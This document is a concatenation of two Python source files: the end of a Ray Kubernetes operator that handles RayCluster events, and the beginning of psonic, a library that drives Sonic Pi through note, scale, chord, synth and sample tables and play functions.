stop_event=self.monitor_stop_event)
self.mtr.run()
def do_in_subprocess(self, f: Callable[[], None], args: Tuple) -> None:
# First stop the subprocess if it's alive
self.clean_up_subprocess()
# Reinstantiate process with f as target and start.
self.subprocess = mp.Process(
name=self.subprocess_name, target=f, args=args, daemon=True)
self.subprocess.start()
def clean_up_subprocess(self):
"""
Clean up the monitor process.
Executed when CR for this cluster is "DELETED".
Executed when Autoscaling monitor is restarted.
"""
if self.subprocess and self.subprocess.is_alive():
# Triggers graceful stop of the monitor loop.
self.monitor_stop_event.set()
self.subprocess.join()
# Clears the event for subsequent runs of the monitor.
self.monitor_stop_event.clear()
def clean_up(self) -> None:
"""Executed when the CR for this cluster is "DELETED".
The key thing is to end the monitoring subprocess.
"""
self.clean_up_subprocess()
self.clean_up_logging()
self.delete_config()
def setup_logging(self) -> None:
"""Add a log handler which appends the name and namespace of this
cluster to the cluster's monitor logs.
"""
self.handler = logging.StreamHandler()
# Filter by subprocess name to get this cluster's monitor logs.
self.handler.addFilter(
lambda rec: rec.processName == self.subprocess_name)
# Lines start with "<cluster name>,<cluster namespace>:"
logging_format = ":".join(
[self.subprocess_name, ray_constants.LOGGER_FORMAT])
self.handler.setFormatter(logging.Formatter(logging_format))
operator_utils.root_logger.addHandler(self.handler)
def clean_up_logging(self) -> None:
operator_utils.root_logger.removeHandler(self.handler)
def set_config(self, config: Dict[str, Any]) -> None:
self.config = config
def write_config(self) -> None:
"""Write config to disk for use by the autoscaling monitor."""
with open(self.config_path, "w") as file:
yaml.dump(self.config, file)
def delete_config(self) -> None:
os.remove(self.config_path)
def set_generation(self, generation: int) -> None:
self._generation = generation
def set_num_retries(self, num_retries: int) -> None:
self._num_retries = num_retries
def get_generation(self) -> int:
return self._generation
def get_num_retries(self) -> int:
return self._num_retries
# Maps ray cluster (name, namespace) pairs to RayCluster python objects.
ray_clusters = {} # type: Dict[Tuple[str, str], RayCluster]
def run_event_loop():
# Instantiate event stream.
if operator_utils.NAMESPACED_OPERATOR:
raycluster_cr_stream = operator_utils.namespaced_cr_stream(
namespace=operator_utils.OPERATOR_NAMESPACE)
else:
raycluster_cr_stream = operator_utils.cluster_scoped_cr_stream()
# Run control loop.
for event in raycluster_cr_stream:
cluster_cr = event["object"]
cluster_name = cluster_cr["metadata"]["name"]
cluster_namespace = cluster_cr["metadata"]["namespace"]
event_type = event["type"]
handle_event(event_type, cluster_cr, cluster_name, cluster_namespace)
def handle_event(event_type, cluster_cr, cluster_name, cluster_namespace):
# TODO: This only detects errors in the parent process and thus doesn't
# catch cluster-specific autoscaling failures. Fix that (perhaps at
# the same time that we eliminate subprocesses).
try:
cluster_action(event_type, cluster_cr, cluster_name, cluster_namespace)
except Exception:
log_prefix = ",".join(cluster_name, cluster_namespace)
if event_type in ["ADDED", "MODIFIED"]:
logger.exception(f"{log_prefix}: Error while updating RayCluster.")
cluster_status_q.put((cluster_name, cluster_namespace,
STATUS_ERROR))
elif event_type == "DELETED":
# Don't try to update CRD's status if the CRD is gone.
logger.exception(
f"Error while deleting RayCluster {cluster_name}.")
def cluster_action(event_type: str, cluster_cr: Dict[str, Any],
cluster_name: str, cluster_namespace: str) -> None:
cluster_config = operator_utils.cr_to_config(cluster_cr)
cluster_identifier = (cluster_name, cluster_namespace)
log_prefix = ",".join(cluster_identifier)
if event_type == "ADDED":
operator_utils.check_redis_password_not_specified(
cluster_config, cluster_identifier)
cluster_status_q.put((cluster_name, cluster_namespace,
STATUS_UPDATING))
ray_cluster = RayCluster(cluster_config)
# Track changes to the custom resource's spec field:
generation = cluster_cr["metadata"]["generation"]
ray_cluster.set_generation(generation)
logger.info(f"{log_prefix}: Launching cluster.")
ray_cluster.create_or_update()
ray_clusters[cluster_identifier] = ray_cluster
cluster_status_q.put((cluster_name, cluster_namespace, STATUS_RUNNING))
elif event_type == "MODIFIED":
ray_cluster = ray_clusters[cluster_identifier]
# Check metadata.generation to determine if there's a spec change.
current_generation = cluster_cr["metadata"]["generation"]
# Check metadata.labels.autoscalerRetries to see if we need to restart
# Ray processes.
status = cluster_cr.get("status", {})
autoscaler_retries = status.get(AUTOSCALER_RETRIES_FIELD, 0)
# True if there's been a chamge to the spec of the custom resource,
# triggering an increment of metadata.generation:
spec_changed = current_generation > ray_cluster.get_generation()
# True if monitor has failed, triggering an increment of
# status.autoscalerRetries:
ray_restart_required = (autoscaler_retries >
ray_cluster.get_num_retries())
if ray_restart_required:
logger.error(f"{log_prefix}: Failed, restarting cluster.")
ray_cluster.set_num_retries(autoscaler_retries)
if spec_changed:
logger.info(f"{log_prefix}: Updating cluster.")
ray_cluster.set_generation(current_generation)
# Update if there's been a change to the spec or if we're attempting
# recovery from autoscaler failure.
if spec_changed or ray_restart_required:
cluster_status_q.put((cluster_name, cluster_namespace,
STATUS_UPDATING))
ray_cluster.set_config(cluster_config)
# Trigger Ray restart only if there's been a failure.
ray_cluster.create_or_update(restart_ray=ray_restart_required)
cluster_status_q.put((cluster_name, cluster_namespace,
STATUS_RUNNING))
elif event_type == "DELETED":
ray_cluster = ray_clusters[cluster_identifier]
ray_cluster.clean_up()
del ray_clusters[cluster_identifier]
def status_handling_loop():
while True:
cluster_name, cluster_namespace, phase = cluster_status_q.get()
try:
operator_utils.set_status(cluster_name, cluster_namespace, phase)
except Exception:
log_prefix = ",".join(cluster_name, cluster_namespace)
logger.exception(f"{log_prefix}: Error setting RayCluster status.")
def main() -> None:
# Run status-handling loop.
status_handler = threading.Thread(target=status_handling_loop, daemon=True)
status_handler.start()
# Make directory for Ray cluster configs
if not os.path.isdir(operator_utils.RAY_CONFIG_DIR):
os.mkdir(operator_utils.RAY_CONFIG_DIR)
while True:
# This outer loop waits for creation of a RayCluster CRD if it hasn't
# already been created.
try:
# Enter main event loop.
run_event_loop()
except ApiException as e:
if e.status == 404:
logger.warning("Waiting for creation of the RayCluster CRD")
time.sleep(5)
else:
logger.error("Failed to enter operator event loop.")
# Unforeseen startup error. Operator pod is
# likely to end up in a crash loop.
raise
if __name__ == "__main__":
main()
|
psonic.py | # The MIT License (MIT)
#
# Copyright (c) 2016 G. Völkl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import time
import threading
from pythonosc import osc_message_builder # osc support
from pythonosc import udp_client
__debug = False
## Base Classes ##
class Synth:
"""
Synthesizer
"""
def __init__(self, name):
self.name = name
class Sample:
"""
Sample
"""
def __init__(self, name):
self.name = name
class ChordQuality:
"""
Chord Quality
"""
def __init__(self, name, inter):
self.name = name
self.inter = inter
class FxName:
"""
FX name
"""
def __init__(self, name):
self.name = name
class Message:
"""
For sending messages between threads
"""
def __init__(self):
self._condition = threading.Condition()
def cue(self):
with self._condition:
self._condition.notifyAll() # Message to threads
def sync(self):
with self._condition:
self._condition.wait() # Wait for message
class Fx:
"""
FX Effects
"""
def __init__(self, mode, phase=0.24, probability=0, prob_pos=0):
self.mode = mode
self.phase = phase
self.probability = probability
self.prob_pos = prob_pos
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
## Decorator ##
def in_thread(func):
def wrapper():
_thread = threading.Thread(target=func)
_thread.start()
return wrapper
## Notes ##
C2 = 36
Cs2 = 37
Db2 = Cs2
D2 = 38
Ds2 = 39
Eb2 = Ds2
E2 = 40
F2 = 41
Fs2 = 42
Gb2 = Fs2
G2 = 43
Gs2 = 44
Ab2 = Gs2
A2 = 45
As2 = 46
Bb2 = As2
B2 = 47
C3 = 48
Cs3 = 49
Db3 = Cs3
D3 = 50
Ds3 = 51
Eb3 = Ds3
E3 = 52
F3 = 53
Fs3 = 54
Gb3 = Fs3
G3 = 55
Gs3 = 56
Ab3 = Gs3
A3 = 57
As3 = 58
Bb3 = As3
B3 = 59
C4 = 60
Cs4 = 61
Db4 = Cs4
D4 = 62
Ds4 = 63
Eb4 = Ds4
E4 = 64
F4 = 65
Fs4 = 66
Gb4 = Fs4
G4 = 67
Gs4 = 68
Ab4 = Gs4
A4 = 69
As4 = 70
Bb4 = As4
B4 = 71
C5 = 72
Cs5 = 73
Db5 = Cs5
D5 = 74
Ds5 = 75
Eb5 = Ds5
E5 = 76
F5 = 77
Fs5 = 78
Gb5 = Fs5
G5 = 79
Gs5 = 80
Ab5 = Gs5
A5 = 81
As5 = 82
Bb5 = As5
B5 = 83
C6 = 84
R = 0
## Synthezier ##
DULL_BELL = Synth('dull_bell')
PRETTY_BELL = Synth('pretty_bell')
SINE = Synth('sine')
SQUARE = Synth('square')
PULSE = Synth('pulse')
SUBPULSE = Synth('subpulse')
DTRI = Synth('dtri')
DPULSE = Synth('dpulse')
FM = Synth('fm')
MOD_FM = Synth('mod_fm')
MOD_SAW = Synth('mod_saw')
MOD_DSAW = Synth('mod_dsaw')
MOD_SINE = Synth('mod_sine')
MOD_TRI = Synth('mod_tri')
MOD_PULSE = Synth('mod_pulse')
SUPERSAW = Synth('supersaw')
HOOVER = Synth('hoover')
SYNTH_VIOLIN = Synth('synth_violin')
PLUCK = Synth('pluck')
PIANO = Synth('piano')
GROWL = Synth('growl')
DARK_AMBIENCE = Synth('dark_ambience')
DARK_SEA_HORN = Synth('dark_sea_horn')
HOLLOW = Synth('hollow')
ZAWA = Synth('zawa')
NOISE = Synth('noise')
GNOISE = Synth('gnoise')
BNOISE = Synth('bnoise')
CNOISE = Synth('cnoise')
DSAW = Synth('dsaw')
TB303 = Synth('tb303')
BLADE = Synth('blade')
PROPHET = Synth('prophet')
SAW = Synth('saw')
BEEP = Synth('beep')
TRI = Synth('tri')
CHIPLEAD = Synth('chiplead') # Sonic Pi 2.10
CHIPBASS = Synth('chipbass')
CHIPNOISE = Synth('chipnoise')
TECHSAWS = Synth('tech_saws') # Sonic Pi 2.11
SOUND_IN = Synth('sound_in')
SOUND_IN_STEREO = Synth('sound_in_stereo')
## Scale Mode (from sonic pi)##
DIATONIC = 'diatonic'
IONIAN = 'ionian'
MAJOR = 'major'
DORIAN = 'dorian'
PHRYGIAN = 'phrygian'
LYDIAN = 'lydian'
MIXOLYDIAN = 'mixolydian'
AEOLIAN = 'aeolian'
MINOR = 'minor'
LOCRIAN = 'locrian'
HEX_MAJOR6 = 'hex_major6'
HEX_DORIAN = 'hex_dorian'
HEX_PHRYGIAN = 'hex_phrygian'
HEX_MAJOR7 = 'hex_major7'
HEX_SUS = 'hex_sus'
HEX_AEOLIAN = 'hex_aeolian'
MINOR_PENTATONIC = 'minor_pentatonic'
YU = 'yu'
MAJOR_PENTATONIC = 'major_pentatonic'
GONG = 'gong'
EGYPTIAN = 'egyptian'
SHANG = 'shang'
JIAO = 'jiao'
ZHI = 'zhi'
RITUSEN = 'ritusen'
WHOLE_TONE = 'whole_tone'
WHOLE = 'whole'
CHROMATIC = 'chromatic'
HARMONIC_MINOR = 'harmonic_minor'
MELODIC_MINOR_ASC = 'melodic_minor_asc'
HUNGARIAN_MINOR = 'hungarian_minor'
OCTATONIC = 'octatonic'
MESSIAEN1 = 'messiaen1'
MESSIAEN2 = 'messiaen2'
MESSIAEN3 = 'messiaen3'
MESSIAEN4 = 'messiaen4'
MESSIAEN5 = 'messiaen5'
MESSIAEN6 = 'messiaen6'
MESSIAEN7 = 'messiaen7'
SUPER_LOCRIAN = 'super_locrian'
HIRAJOSHI = 'hirajoshi'
KUMOI = 'kumoi'
NEAPLOLITAN_MAJOR = 'neapolitan_major'
BARTOK = 'bartok'
BHAIRAV = 'bhairav'
LOCRIAN_MAJOR = 'locrian_major'
AHIRBHAIRAV = 'ahirbhairav'
ENIGMATIC = 'enigmatic'
NEAPLOLITAN_MINOR = 'neapolitan_minor'
PELOG = 'pelog'
AUGMENTED2 = 'augmented2'
SCRIABIN = 'scriabin'
HARMONIC_MAJOR = 'harmonic_major'
MELODIC_MINOR_DESC = 'melodic_minor_desc'
ROMANIAN_MINOR = 'romanian_minor'
HINDU = 'hindu'
IWATO = 'iwato'
MELODIC_MINOR = 'melodic_minor'
DIMISHED2 = 'diminished2'
MARVA = 'marva'
MELODIC_MAJOR = 'melodic_major'
INDIAN = 'indian'
SPANISH = 'spanish'
PROMETHEUS = 'prometheus'
DIMISHED = 'diminished'
TODI = 'todi'
LEADING_WHOLE = 'leading_whole'
AUGMENTED = 'augmented'
PRUVI = 'purvi'
CHINESE = 'chinese'
LYDIAN_MINOR = 'lydian_minor'
I = 'i'
II = 'ii'
III = 'iii'
IV = 'iv'
V = 'v'
VI = 'vi'
VII = 'vii'
VIII = 'viii'
_ionian_sequence = [2, 2, 1, 2, 2, 2, 1]
_hex_sequence = [2, 2, 1, 2, 2, 3]
_pentatonic_sequence = [3, 2, 2, 3, 2]
_SCALE_MODE = {
'diatonic': _ionian_sequence,
'ionian': _ionian_sequence,
'major': _ionian_sequence,
'dorian': _ionian_sequence[1:] + _ionian_sequence[:1], # rotate 1
'phrygian': _ionian_sequence[2:] + _ionian_sequence[:2], # rotate(2)
'lydian': _ionian_sequence[3:] + _ionian_sequence[:3], # rotate(3)
'mixolydian': _ionian_sequence[4:] + _ionian_sequence[:4], # rotate(4)
'aeolian': _ionian_sequence[5:] + _ionian_sequence[:5], # rotate(5)
'minor': _ionian_sequence[5:] + _ionian_sequence[:5], # rotate(5)
'locrian': _ionian_sequence[6:] + _ionian_sequence[:6], # rotate(6)
'hex_major6': _hex_sequence,
'hex_dorian': _hex_sequence[1:] + _hex_sequence[:1], # rotate(1)
'hex_phrygian': _hex_sequence[2:] + _hex_sequence[:2], # rotate(2)
'hex_major7': _hex_sequence[3:] + _hex_sequence[:3], # rotate(3)
'hex_sus': _hex_sequence[4:] + _hex_sequence[:4], # rotate(4)
'hex_aeolian': _hex_sequence[5:] + _hex_sequence[:5], # rotate(5)
'minor_pentatonic': _pentatonic_sequence,
'yu': _pentatonic_sequence,
'major_pentatonic': _pentatonic_sequence[1:] + _pentatonic_sequence[:1], # rotate(1)
'gong': _pentatonic_sequence[1:] + _pentatonic_sequence[:1], # rotate(1)
'egyptian': _pentatonic_sequence[2:] + _pentatonic_sequence[:2], # rotate(2)
'shang': _pentatonic_sequence[2:] + _pentatonic_sequence[:2], # rotate(2)
'jiao': _pentatonic_sequence[3:] + _pentatonic_sequence[:3], # rotate(3)
'zhi': _pentatonic_sequence[4:] + _pentatonic_sequence[:4], # rotate(4)
'ritusen': _pentatonic_sequence[4:] + _pentatonic_sequence[:4], # rotate(4)
'whole_tone': [2, 2, 2, 2, 2, 2],
'whole': [2, 2, 2, 2, 2, 2],
'chromatic': [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
'harmonic_minor': [2, 1, 2, 2, 1, 3, 1],
'melodic_minor_asc': [2, 1, 2, 2, 2, 2, 1],
'hungarian_minor': [2, 1, 3, 1, 1, 3, 1],
'octatonic': [2, 1, 2, 1, 2, 1, 2, 1],
'messiaen1': [2, 2, 2, 2, 2, 2],
'messiaen2': [1, 2, 1, 2, 1, 2, 1, 2],
'messiaen3': [2, 1, 1, 2, 1, 1, 2, 1, 1],
'messiaen4': [1, 1, 3, 1, 1, 1, 3, 1],
'messiaen5': [1, 4, 1, 1, 4, 1],
'messiaen6': [2, 2, 1, 1, 2, 2, 1, 1],
'messiaen7': [1, 1, 1, 2, 1, 1, 1, 1, 2, 1],
'super_locrian': [1, 2, 1, 2, 2, 2, 2],
'hirajoshi': [2, 1, 4, 1, 4],
'kumoi': [2, 1, 4, 2, 3],
'neapolitan_major': [1, 2, 2, 2, 2, 2, 1],
'bartok': [2, 2, 1, 2, 1, 2, 2],
'bhairav': [1, 3, 1, 2, 1, 3, 1],
'locrian_major': [2, 2, 1, 1, 2, 2, 2],
'ahirbhairav': [1, 3, 1, 2, 2, 1, 2],
'enigmatic': [1, 3, 2, 2, 2, 1, 1],
'neapolitan_minor': [1, 2, 2, 2, 1, 3, 1],
'pelog': [1, 2, 4, 1, 4],
'augmented2': [1, 3, 1, 3, 1, 3],
'scriabin': [1, 3, 3, 2, 3],
'harmonic_major': [2, 2, 1, 2, 1, 3, 1],
'melodic_minor_desc': [2, 1, 2, 2, 1, 2, 2],
'romanian_minor': [2, 1, 3, 1, 2, 1, 2],
'hindu': [2, 2, 1, 2, 1, 2, 2],
'iwato': [1, 4, 1, 4, 2],
'melodic_minor': [2, 1, 2, 2, 2, 2, 1],
'diminished2': [2, 1, 2, 1, 2, 1, 2, 1],
'marva': [1, 3, 2, 1, 2, 2, 1],
'melodic_major': [2, 2, 1, 2, 1, 2, 2],
'indian': [4, 1, 2, 3, 2],
'spanish': [1, 3, 1, 2, 1, 2, 2],
'prometheus': [2, 2, 2, 5, 1],
'diminished': [1, 2, 1, 2, 1, 2, 1, 2],
'todi': [1, 2, 3, 1, 1, 3, 1],
'leading_whole': [2, 2, 2, 2, 2, 1, 1],
'augmented': [3, 1, 3, 1, 3, 1],
'purvi': [1, 3, 2, 1, 1, 3, 1],
'chinese': [4, 2, 1, 4, 1],
'lydian_minor': [2, 2, 2, 1, 1, 2, 2],
'i': _ionian_sequence,
'ii': _ionian_sequence[1:] + _ionian_sequence[:1], # rotate(1)
'iii': _ionian_sequence[2:] + _ionian_sequence[:2], # rotate(2)
'iv': _ionian_sequence[3:] + _ionian_sequence[:3], # rotate(3)
'v': _ionian_sequence[4:] + _ionian_sequence[:4], # rotate(4)
'vi': _ionian_sequence[5:] + _ionian_sequence[:5], # rotate(5)
'vii': _ionian_sequence[6:] + _ionian_sequence[:6], # rotate(6),
'viii': _ionian_sequence[7:] + _ionian_sequence[:7]} # rotate(7)
## Chord Quality (from sonic pi) ##
MAJOR7 = "major7"
DOM7 = "dom7"
MINOR7 = "minor7"
AUG = "aug"
DIM = "dim"
DIM7 = "dim7"
_CHORD_QUALITY = {
'major': [0, 4, 7],
'minor': [0, 3, 7],
'major7': [0, 4, 7, 11],
'dom7': [0, 4, 7, 10],
'minor7': [0, 3, 7, 10],
'aug': [0, 4, 8],
'dim': [0, 3, 6],
'dim7': [0, 3, 6, 9],
'1': [0],
"5": [0, 7],
"+5": [0, 4, 8],
"m+5": [0, 3, 8],
"sus2": [0, 2, 7],
"sus4": [0, 5, 7],
"6": [0, 4, 7, 9],
"m6": [0, 3, 7, 9],
"7sus2": [0, 2, 7, 10],
"7sus4": [0, 5, 7, 10],
"7-5": [0, 4, 6, 10],
"m7-5": [0, 3, 6, 10],
"7+5": [0, 4, 8, 10],
"m7+5": [0, 3, 8, 10],
"9": [0, 4, 7, 10, 14],
"m9": [0, 3, 7, 10, 14],
"m7+9": [0, 3, 7, 10, 14],
"maj9": [0, 4, 7, 11, 14],
"9sus4": [0, 5, 7, 10, 14],
"6*9": [0, 4, 7, 9, 14],
"m6*9": [0, 3, 9, 7, 14],
"7-9": [0, 4, 7, 10, 13],
"m7-9": [0, 3, 7, 10, 13],
"7-10": [0, 4, 7, 10, 15],
"9+5": [0, 10, 13],
"m9+5": [0, 10, 14],
"7+5-9": [0, 4, 8, 10, 13],
"m7+5-9": [0, 3, 8, 10, 13],
"11": [0, 4, 7, 10, 14, 17],
"m11": [0, 3, 7, 10, 14, 17],
"maj11": [0, 4, 7, 11, 14, 17],
"11+": [0, 4, 7, 10, 14, 18],
"m11+": [0, 3, 7, 10, 14, 18],
"13": [0, 4, 7, 10, 14, 17, 21],
"m13": [0, 3, 7, 10, 14, 17, 21],
"M": [0, 4, 7],
"m": [0, 3, 7],
"7": [0, 4, 7, 10],
"M7": [0, 4, 7, 11],
"m7": [0, 3, 7],
"augmented": [0, 4, 8],
"a": [0, 4, 8],
"diminished": [0, 3, 6],
"i": [0, 3, 6],
"diminished7": [0, 3, 6, 9],
"i7": [0, 3, 6, 9]}
## Sample ##
## Drum Sounds
DRUM_HEAVY_KICK = Sample('drum_heavy_kick')
DRUM_TOM_MID_SOFT = Sample('drum_tom_mid_soft')
DRUM_TOM_MID_HARD = Sample('drum_tom_mid_hard')
DRUM_TOM_LO_SOFT = Sample('drum_tom_lo_soft')
DRUM_TOM_LO_HARD = Sample('drum_tom_lo_hard')
DRUM_TOM_HI_SOFT = Sample('drum_tom_hi_soft')
DRUM_TOM_HI_HARD = Sample('drum_tom_hi_hard')
DRUM_SPLASH_SOFT = Sample('drum_splash_soft')
DRUM_SPLASH_HARD = Sample('drum_splash_hard')
DRUM_SNARE_SOFT = Sample('drum_snare_soft')
DRUM_SNARE_HARD = Sample('drum_snare_hard')
DRUM_CYMBAL_SOFT = Sample('drum_cymbal_soft')
DRUM_CYMBAL_HARD = Sample('drum_cymbal_hard')
DRUM_CYMBAL_OPEN = Sample('drum_cymbal_open')
DRUM_CYMBAL_CLOSED = Sample('drum_cymbal_closed')
DRUM_CYMBAL_PEDAL = Sample('drum_cymbal_pedal')
DRUM_BASS_SOFT = Sample('drum_bass_soft')
DRUM_BASS_HARD = Sample('drum_bass_hard')
DRUM_COWBELL = Sample('drum_cowbell')
DRUM_ROLL = Sample('drum_roll')
## Electric Sounds
ELEC_TRIANGLE = Sample('elec_triangle')
ELEC_SNARE = Sample('elec_snare')
ELEC_LO_SNARE = Sample('elec_lo_snare')
ELEC_HI_SNARE = Sample('elec_hi_snare')
ELEC_MID_SNARE = Sample('elec_mid_snare')
ELEC_CYMBAL = Sample('elec_cymbal')
ELEC_SOFT_KICK = Sample('elec_soft_kick')
ELEC_FILT_SNARE = Sample('elec_filt_snare')
ELEC_FUZZ_TOM = Sample('elec_fuzz_tom')
ELEC_CHIME = Sample('elec_chime')
ELEC_BONG = Sample('elec_bong')
ELEC_TWANG = Sample('elec_twang')
ELEC_WOOD = Sample('elec_wood')
ELEC_POP = Sample('elec_pop')
ELEC_BEEP = Sample('elec_beep')
ELEC_BLIP = Sample('elec_blip')
ELEC_BLIP2 = Sample('elec_blip2')
ELEC_PING = Sample('elec_ping')
ELEC_BELL = Sample('elec_bell')
ELEC_FLIP = Sample('elec_flip')
ELEC_TICK = Sample('elec_tick')
ELEC_HOLLOW_KICK = Sample('elec_hollow_kick')
ELEC_TWIP = Sample('elec_twip')
ELEC_PLIP = Sample('elec_plip')
ELEC_BLUP = Sample('elec_blup')
## Sounds featuring guitars
GUIT_HARMONICS = Sample('guit_harmonics')
GUIT_E_FIFTHS = Sample('guit_e_fifths')
GUIT_E_SLIDE = Sample('guit_e_slide')
## Miscellaneous Sounds
MISC_BURP = Sample('misc_burp')
MISC_CROW = Sample('misc_crow')
MISC_CINEBOOM = Sample('misc_cineboom')
## Percurssive Sounds
PERC_BELL = Sample('perc_bell')
PERC_SWASH = Sample('perc_swash')
PERC_TILL = Sample('perc_till')
## Ambient Sounds
AMBI_SOFT_BUZZ = Sample('ambi_soft_buzz')
AMBI_SWOOSH = Sample('ambi_swoosh')
AMBI_DRONE = Sample('ambi_drone')
AMBI_GLASS_HUM = Sample('ambi_glass_hum')
AMBI_GLASS_RUB = Sample('ambi_glass_rub')
AMBI_HAUNTED_HUM = Sample('ambi_haunted_hum')
AMBI_PIANO = Sample('ambi_piano')
AMBI_LUNAR_LAND = Sample('ambi_lunar_land')
AMBI_DARK_WOOSH = Sample('ambi_dark_woosh')
AMBI_CHOIR = Sample('ambi_choir')
## Bass Sounds
BASS_HIT_C = Sample('bass_hit_c')
BASS_HARD_C = Sample('bass_hard_c')
BASS_THICK_C = Sample('bass_thick_c')
BASS_DROP_C = Sample('bass_drop_c')
BASS_WOODSY_C = Sample('bass_woodsy_c')
BASS_VOXY_C = Sample('bass_voxy_c')
BASS_VOXY_HIT_C = Sample('bass_voxy_hit_c')
BASS_DNB_F = Sample('bass_dnb_f')
BD_808 = Sample('bd_808')
BD_ADA = Sample('bd_ada')
BD_BOOM = Sample('bd_boom')
BD_FAT = Sample('bd_fat')
BD_GAS = Sample('bd_gas')
BD_HAUS = Sample('bd_haus')
BD_KLUB = Sample('bd_klub')
BD_PURE = Sample('bd_pure')
BD_SONE = Sample('bd_sone')
BD_TEK = Sample('bd_tek')
BD_ZOME = Sample('bd_zome')
BD_ZUM = Sample('bd_zum')
## Sounds for Looping
LOOP_INDUSTRIAL = Sample('loop_industrial')
LOOP_COMPUS = Sample('loop_compus')
LOOP_AMEN = Sample('loop_amen')
LOOP_AMEN_FULL = Sample('loop_amen_full')
LOOP_SAFARI = Sample('loop_safari')
LOOP_TABLA = Sample('loop_tabla')
## Tabla
TABLA_TAS1 = Sample('tabla_tas1')
TABLA_TAS2 = Sample('tabla_tas2')
TABLA_TAS3 = Sample('tabla_tas3')
TABLA_KE1 = Sample('tabla_ke1')
TABLA_KE2 = Sample('tabla_ke2')
TABLA_KE3 = Sample('tabla_ke3')
TABLA_NA = Sample('tabla_na')
TABLA_NA_O = Sample('tabla_na_o')
TABLA_TUN1 = Sample('tabla_tun1')
TABLA_TUN2 = Sample('tabla_tun2')
TABLA_TUN3 = Sample('tabla_tun3')
TABLA_TE1 = Sample('tabla_te1')
TABLA_TE2 = Sample('tabla_te2')
TABLA_TE_NE = Sample('tabla_te_ne')
TABLA_TE_M = Sample('tabla_te_m')
TABLA_GHE1 = Sample('tabla_ghe1')
TABLA_GHE2 = Sample('tabla_ghe2')
TABLA_GHE3 = Sample('tabla_ghe3')
TABLA_GHE4 = Sample('tabla_ghe4')
TABLA_GHE5 = Sample('tabla_ghe5')
TABLA_GHE6 = Sample('tabla_ghe6')
TABLA_GHE7 = Sample('tabla_ghe7')
TABLA_GHE8 = Sample('tabla_ghe8')
TABLA_DHEC = Sample('tabla_dhec')
TABLA_NA_S = Sample('tabla_na_s')
TABLA_RE = Sample('tabla_re')
# Vinyl
VINYL_BACKSPIN = Sample('vinyl_backspin')
VINYL_REWIND = Sample('vinyl_rewind')
VINYL_SCRATCH = Sample('vinyl_scratch')
VINYL_HISS = Sample('vinyl_hiss')
## FX
BITCRUSHER = FxName('bitcrusher')
COMPRESSOR = FxName('compressor')
ECHO = FxName('echo')
FLANGER = FxName('flanger')
KRUSH = FxName('krush')
LPF = FxName('lpf')
PAN = FxName('pan')
PANSLICER = FxName('panslicer')
REVERB = FxName('reverb')
SLICER = FxName('slicer')
WOBBLE = FxName('wobble')
## Module attributes ##
_current_synth = BEEP
## Module methodes ##
def use_synth(synth):
global _current_synth
_current_synth = synth
def synth(name, note=None, attack=None, decay=None, sustain_level=None, sustain=None, release=None, cutoff=None,
cutoff_attack=None, amp=None, pan=None):
parameters = []
parameter = ''
if note is not None: parameters.append('note: {0}'.format(note))
if attack is not None: parameters.append('attack: {0}'.format(attack))
if cutoff_attack is not None: parameters.append('cutoff_attack: {0}'.format(cutoff_attack))
if decay is not None: parameters.append('decay: {0}'.format(decay))
if sustain_level is not None: parameters.append('sustain_level: {0}'.format(sustain_level))
if sustain is not None: parameters.append('sustain: {0}'.format(sustain))
if release is not None: parameters.append('release: {0}'.format(release))
if cutoff is not None: parameters.append('cutoff: {0}'.format(cutoff))
if amp is not None: parameters.append('amp: {0}'.format(amp))
if pan is not None: parameters.append('pan: {0}'.format(pan))
if len(parameters) > 0: parameter = ',' + ','.join(parameters)
command = 'synth :{0}{1}'.format(name.name, parameter)
_debug('synth command={}'.format(command))
synth_server.synth(command)
def play(note, attack=None, decay=None, sustain_level=None, sustain=None, release=None, cutoff=None,
cutoff_attack=None, amp=None, pan=None):
parameters = []
parameter = ''
if attack is not None: parameters.append('attack: {0}'.format(attack))
if cutoff_attack is not None: parameters.append('cutoff_attack: {0}'.format(cutoff_attack))
if decay is not None: parameters.append('decay: {0}'.format(decay))
if sustain_level is not None: parameters.append('sustain_level: {0}'.format(sustain_level))
if sustain is not None: parameters.append('sustain: {0}'.format(sustain))
if release is not None: parameters.append('release: {0}'.format(release))
if cutoff is not None: parameters.append('cutoff: {0}'.format(cutoff))
if amp is not None: parameters.append('amp: {0}'.format(amp))
if pan is not None: parameters.append('pan: {0}'.format(pan))
if len(parameters) > 0: parameter = ',' + ','.join(parameters)
command = 'play {0}{1}'.format(note, parameter)
_debug('play command={}'.format(command))
synth_server.play(command)
def play_pattern_timed(notes, times, release=None):
"""
play notes
:param notes:
:param times:
:return:
"""
if not type(notes) is list: notes = [notes]
if not type(times) is list: times = [times]
for t in times:
for i in notes:
play(i, release=release)
sleep(t)
def play_pattern(notes):
"""
:param notes:
:return:
"""
play_pattern_timed(notes, 1)
def sample(sample, rate=None, attack=None, sustain=None, release=None, beat_stretch=None,
start=None, finish=None, amp=None, pan=None):
parameters = []
parameter = ''
command = ''
if rate is not None: parameters.append('rate: {0}'.format(rate))
if attack is not None: parameters.append('attack: {0}'.format(attack))
if sustain is not None: parameters.append('sustain: {0}'.format(sustain))
if release is not None: parameters.append('release: {0}'.format(release))
if beat_stretch is not None: parameters.append('beat_stretch: {0}'.format(beat_stretch))
if start is not None: parameters.append('start: {0}'.format(start))
if finish is not None: parameters.append('finish: {0}'.format(finish))
if amp is not None: parameters.append('amp: {0}'.format(amp))
if pan is not None: parameters.append('pan: {0}'.format(pan))
